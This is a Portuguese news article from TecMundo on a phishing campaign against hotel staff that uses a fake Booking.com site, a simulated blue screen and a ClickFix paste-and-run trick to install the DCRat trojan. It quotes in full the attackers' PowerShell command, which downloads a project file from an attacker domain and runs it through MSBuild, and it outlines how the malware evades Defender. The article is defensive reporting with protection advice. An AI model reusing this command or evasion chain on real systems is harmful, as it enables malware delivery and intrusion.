menu
Logo TecMundo
Segurança

Site falso do Booking.com mostra tela azul para enganar vítimas e invadir PCs

Especialistas em segurança suspeitam que grupos criminosos russos estão por trás da campanha que usa e-mails falsos de reembolso de estadias em hotéis para enganar funcionários de hospitalidade

Avatar do(a) autor(a): Cecilia Ferraz
Cecilia Ferraz

schedule06/01/2026, às 17:45

Uma campanha de ciberataques identificada como PHALT#BLYX está mirando o setor de hospitalidade na Europa, combinando engenharia social com técnicas avançadas de invasão. 

Descoberta em dezembro de 2025 pela empresa de segurança Securonix, a operação usa e-mails falsos do site de viagens Booking.com e telas simuladas de erro do Windows para fazer as próprias vítimas executarem malware em seus computadores.

smart_display

Nossos vídeos em destaque

O ataque começa com um e-mail que chega à caixa de entrada de um funcionário de hotel, informando sobre um cancelamento de reserva com valores significativos. Para um profissional do setor de hospitalidade, que lida com dezenas de reservas diariamente, especialmente durante o fim de ano, a mensagem desperta um alerta, e ele age imediatamente.

"O valor do reembolso reivindicado é significativo o suficiente para criar uma sensação de urgência para o destinatário do e-mail", explica o relatório da Securonix.

Leia Mais
Venezuelanos baixam apps de VPN, Proxy e Wallets após ataque dos EUA

Ao clicar no botão "Ver detalhes" para verificar a suposta cobrança, o funcionário é redirecionado para um site falso, quase perfeito, do Booking.com. A página falsa, hospedada no domínio "low-house.com", replica a paleta de cores oficial, os logotipos e até os estilos de fonte da plataforma de reservas.

tela_azul_golpe.jpg
Golpe mostra tela azul com comandos falsos para engajar vítimas no golpe. Imagem: Securonix.

"Para olhos destreinados, é impossível distinguir essa página do site legítimo", alertam os pesquisadores. O site permanece ativo e praticamente indetectável pela maioria dos sistemas de segurança no momento da análise.

O que acontece a seguir é a engenharia social. Em vez de exibir os detalhes da reserva, o site falso apresenta uma mensagem de erro: "O carregamento está demorando muito". Um botão proeminente oferece a solução: "Atualizar página".

Quando o usuário clica, o navegador imediatamente entra em tela cheia e exibe uma réplica convincente da Tela Azul da Morte do Windows, conhecida pela sigla BSOD. Para qualquer pessoa que usou computadores, essa tela azul representa um dos piores cenários — uma falha crítica e irrecuperável do sistema.

Leia Mais
Honeypot: Criminosos do grupo ShinyHunters caem em armadilha de empresa de segurança

Sobre a tela falsa de falha, surge um prompt com instruções técnicas: pressione as teclas Windows + R, depois Ctrl + V, e finalmente Enter. Para um usuário sem conhecimentos técnicos avançados, isso pode parecer uma sequência de recuperação de emergência ou um atalho administrativo secreto. Mas é aí que os criminosos agem. 

booking.com_falso.jpg
Site falso do Booking.com é feito com cuidado para parecer realista e enganar vítimas. Imagem: Securonix.

Enquanto a vítima navegava pelo site falso do Booking.com, um script JavaScript malicioso executado no navegador copiou silenciosamente um comando PowerShell para a área de transferência do Windows, onde o sistema guarda os dados que você copiou. 

O JavaScript pode acessar e modificar a área de transferência através da API do navegador, sem que o usuário perceba. Então, quando a vítima pressiona Ctrl+V conforme as instruções na tela falsa de BSOD, ela não está colando o que acha que está, mas sim um comando malicioso pré-preparado pelos invasores.

"Essa técnica é particularmente perigosa porque depende das próprias mãos do usuário para contornar os controles de segurança que normalmente bloqueariam a execução automatizada de scripts", observam os pesquisadores.

Leia Mais
Venezuela sofreu corte de internet e blecaute antes de ataque dos EUA

Anatomia do comando PowerShell

O comando que é colado e executado tem a seguinte estrutura:

  • powershell -c “start https://admin.booking.com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr https://2fa-bns.com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj”

Cada parte desse comando tem uma função específica na cadeia de infecção. A primeira parte abre o portal administrativo legítimo do Booking.com no navegador padrão. Assim, o usuário vê a página oficial carregando e acredita que deu tudo certo, e não percebe a atividade maliciosa que está acontecendo em segundo plano.

A segunda linha realiza uma busca recursiva em todo o disco C procurando pelo arquivo "msbuild.exe". O MSBuild é o Microsoft Build Engine, uma ferramenta legítima de compilação que acompanha o .NET Framework, presente na maioria dos computadores Windows. 

Ela também possui um comando que varre todos os diretórios, suprime mensagens de erro e seleciona apenas o primeiro resultado encontrado. O caminho completo do executável é armazenado na variável $msb.

Leia Mais
Vírus que rouba contas do Discord é vendido por menos de R$ 60

Por que isso é importante? Porque o MSBuild.exe é um binário assinado digitalmente pela Microsoft e considerado confiável pelo Windows. Antivírus e sistemas de lista de aplicativos permitidos raramente bloqueiam sua execução.

Depois há um comando que baixa um arquivo do servidor controlado pelos invasores, localizado no domínio "2fa-bns.com". O arquivo é salvo como "v.proj" na pasta %ProgramData% (normalmente C:\ProgramData). A extensão .proj indica um arquivo de projeto MSBuild, que é essencialmente um documento XML contendo instruções de compilação e, neste caso, código malicioso embutido.

Finalmente, o comando executa o MSBuild.exe (cujo caminho foi armazenado em $msb) passando o arquivo v.proj baixado como parâmetro. O MSBuild interpreta o arquivo XML, compila e executa o código C# incorporado dentro dele.

Essa técnica é conhecida como "Proxy Execution" (T1127.001 no framework MITRE ATT&CK) e permite que código malicioso seja executado através de um processo confiável, contornando defesas baseadas em reputação.

Leia Mais
Drones sobrevoam sede do governo da Venezuela; militares atiram

Uma das descobertas mais reveladoras no arquivo v.proj é a presença de strings de depuração em russo deixadas pelos desenvolvedores:

  • Попытка $attempt из $maxAttempts… (Tradução: "Tentativa X de Y...")
  • Установка успешно завершена! (Tradução: "Instalação concluída com sucesso!")

Essas não são traduções automáticas ou strings aleatórias. São frases gramaticalmente corretas em russo, naturalmente escritas. Este detalhe aponta para um agente de ameaça que fala russo ou para um kit de malware desenvolvido na Rússia. 

Como a carga final é o DCRat, um trojan popular em fóruns clandestinos russos, os pesquisadores avaliam com alta confiança que toda a campanha está ligada a grupos criminosos russos.

Vivendo da Terra

A técnica, conhecida no jargão da segurança cibernética como "Living off the Land" (vivendo da terra), é particularmente insidiosa. Ao abusar de ferramentas confiáveis do próprio sistema operacional, os invasores contornam a maioria das defesas tradicionais.

Leia Mais
Brasil é alvo de novo vírus que se espalha sozinho e apaga os próprios rastros

"O MSBuild.exe é um aplicativo confiável da Microsoft, isso geralmente contorna a lista de aplicativos permitidos ou a detecção de antivírus", explica o relatório da Securonix.

Uma vez estabelecido no sistema, o malware age com precisão cirúrgica. Primeiro, desativa o Windows Defender adicionando exclusões para pastas e tipos de arquivo específicos, tornando-se invisível para o antivírus. Em seguida, verifica se possui privilégios de administrador.

Se o usuário for um administrador, o malware desativa completamente a proteção em tempo real do Windows Defender e baixa sua carga final. Se não, adota uma tática de pressão psicológica conhecida como "spam de UAC": bombardeia o usuário com pop-ups repetidos solicitando permissão de administrador, esperando que a pessoa ceda à frustração e clique em "Sim" apenas para fazer os avisos pararem.

DCRat é a carga final

O malware implantado é o DCRat, um Trojan de Acesso Remoto amplamente comercializado em fóruns clandestinos russos. Uma vez instalado, o programa estabelece uma conexão com servidores de comando e controle e envia uma "impressão digital" completa do computador infectado: nome do usuário, sistema operacional, privilégios de acesso, antivírus instalado e até qual janela está aberta naquele momento.

Leia Mais
GOV.BR espiona o usuário? TecMundo investigou

Para se esconder, o DCRat emprega uma técnica sofisticada chamada "process hollowing": inicia um programa legítimo do Windows em modo suspenso, esvazia sua memória, preenche o espaço com código malicioso e retoma a execução. Nos gerenciadores de tarefas, o processo infectado aparece como um componente normal do sistema operacional.

As capacidades do malware são extensas: transmissão da tela em tempo real, captura de tudo que é digitado (incluindo senhas e dados bancários), execução remota de comandos e download de malware adicional. No caso observado pela Securonix, os invasores instalaram um minerador de criptomoedas, usando secretamente os recursos computacionais da vítima para gerar lucro.

Mas as possibilidades vão muito além. Com acesso total a um computador na rede de um hotel, os criminosos podem roubar dados sensíveis de hóspedes, informações de cartões de crédito, espalhar-se para outros sistemas e comprometer toda a infraestrutura corporativa.

Rastros russos

Vários elementos apontam para a origem russa da campanha. O código do malware contém mensagens de debug em cirílico, como "Попытка $attempt из $maxAttempts…" (Tentativa X de Y) e "Установка успешно завершена!" (Instalação concluída com sucesso).

Leia Mais
Grok, de Elon Musk, foi usado para criar imagens abusivas de mulheres e crianças com IA

"O uso de russo gramaticalmente correto para registros internos sugere que o autor é um falante nativo", observa o relatório. “Não se trata de strings traduzidas automaticamente, mas de frases naturais usadas durante o desenvolvimento.”

O DCRat é particularmente popular entre grupos criminosos russos, sendo frequentemente vendido em fóruns clandestinos como serviço de "Malware-as-a-Service". A combinação desses fatores desenha um quadro claro de atribuição.

Ameaça em evolução

A campanha PHALT#BLYX representa uma evolução significativa em relação a ataques anteriores. Pesquisadores da Securonix correlacionaram essa atividade com amostras de meses anteriores que utilizavam métodos mais simples, como arquivos de aplicativo HTML, facilmente detectáveis por antivírus.

A mudança para técnicas baseadas em MSBuild e engenharia social ClickFix demonstra uma adaptação estratégica aos controles de segurança modernos. Os criminosos estão constantemente refinando suas táticas para contornar as defesas que bloquearam suas tentativas anteriores.

Leia Mais
Caças, drones e mais: conheça as tecnologias usadas pelos EUA na captura de Maduro

"Os agentes de ameaças por trás do PHALT#BLYX demonstraram uma evolução notável em sua cadeia de infecção", afirma o relatório.

O timing da campanha também não é acidental. Mirando o setor de hospitalidade durante a alta temporada de festas de fim de ano, quando os funcionários estão sob maior pressão e lidando com volumes elevados de reservas e cancelamentos, os invasores maximizam suas chances de sucesso.

Defesa complexa

Proteger-se contra ataques desse tipo requer uma abordagem em múltiplas camadas. Educação e treinamento são fundamentais, especialmente sobre táticas de engenharia social como ClickFix e a simulação de telas de erro.

Mensagens legítimas de erro do Windows nunca pedem que usuários colem comandos ou executem scripts. A própria Tela Azul da Morte autêntica apenas exibe um código de erro e instrui a reinicialização do computador, sem oferecer "correções" complexas.

Leia Mais
Como desbloquear sites bloqueados no Google Chrome?

Organizações do setor de hospitalidade devem implementar políticas de verificação por canal alternativo para comunicações financeiras urgentes. Um funcionário que recebe um e-mail sobre cancelamento com valores altos deve confirmar a informação diretamente pelo sistema do Booking.com ou por telefone, nunca clicando em links recebidos por e-mail.

No nível técnico, o monitoramento de execuções incomuns de ferramentas como MSBuild.exe em estações de trabalho pode ajudar a identificar ataques em andamento. Sistemas de detecção baseados em comportamento, que analisam a sequência de ações em vez de apenas procurar arquivos maliciosos conhecidos, são cada vez mais necessários.

Como identificar e se proteger

Apesar de sofisticado, o golpe pode ser evitado. A Securonix recomenda algumas formas de identificar esse tipo de campanha.

  1. E-mails sobre cancelamentos urgentes com valores altos sem contato prévio;
  2. Links que redirecionam para domínios diferentes do Booking.com oficial;
  3. Mensagens de erro que pedem para executar comandos ou colar códigos;
  4. Telas de erro do Windows que oferecem "correções" complexas;
  5. Qualquer BSOD (Tela Azul) que não simplesmente reinicia o computador.

Para se proteger, é possível tomar algumas ações, como:

Leia Mais
Como acessar sites bloqueados de outros países via VPN
  • Não clique em links de e-mails inesperados;
  • Verifique cancelamentos diretamente no sistema do Booking.com;
  • Nunca execute comandos ou cole códigos sugeridos em mensagens de erro;
  • Em caso de dúvida, contate o suporte técnico da sua empresa;
  • Relate tentativas de phishing ao departamento de TI.

Para continuar informado, siga o TecMundo nas redes sociais. Inscreva-se em nossa newsletter e canal do YouTube para mais notícias de tecnologia e segurança.

Avatar do(a) autor(a): Cecilia Ferraz
Cecilia Ferraz

Cecilia Ferraz é formada em Jornalismo pela Universidade Metodista de São Paulo. Repórter do TecMundo Security, especializada em cibersegurança, tecnologia e negócios.

local_mall

Ofertas TecMundo

Atualizado há 2 horas
Smartphone Poco C71, 128GB

Com capinha

Smartphone Poco C71, 128GB

R$ 0,01

Celulares shopee.com.brnew_releases
Air Fryer EOS Family Chef Gourmet, 8L
10% off

Espaçosa!

Air Fryer EOS Family Chef Gourmet, 8L

R$ 289,00

Eletro amazon.com.brnew_releases
Soundbar Samsung HW-B400F/ZD 2.0 Canais
27% off

Oferta!

Soundbar Samsung HW-B400F/ZD 2.0 Canais

R$ 629,00

Áudio casasbahia.com.brnew_releases
Caixa de Som Bluetooth JBL Flip Essential 2
21% off

Imperdível!

Caixa de Som Bluetooth JBL Flip Essential 2

R$ 494,10

Áudio magazineluiza.com.brnew_releases
Headphone Bluetooth TAA4216BK/00
54% off

Oportunidade!

Headphone Bluetooth TAA4216BK/00

R$ 184,00

Áudio amazon.com.brnew_releases
Liquidificador Mondial L‑99
42% off

Oferta!

Liquidificador Mondial L‑99

R$ 99,99

Eletro shopee.com.brnew_releases
local_mall

Guia de Compras TecMundo

As melhores promoções e cupons para sua próxima compra!

Confira todas as ofertas
star

Continue por aqui

Imagem de Estadão
Estadão
Imagem de Lançamentos
Lançamentos
Imagem de Gadgets
Gadgets
Imagem de Cibersegurança
Cibersegurança
Imagem de Filmes e séries
Filmes e séries
Imagem de Mercado
Mercado
Imagem de Cupons
Cupons
Imagem de Internet
Internet
Imagem de Games
Games
Imagem de Apostas
Apostas
Imagem de Ciência
Ciência
Imagem de Software
Software
Imagem de IA
IA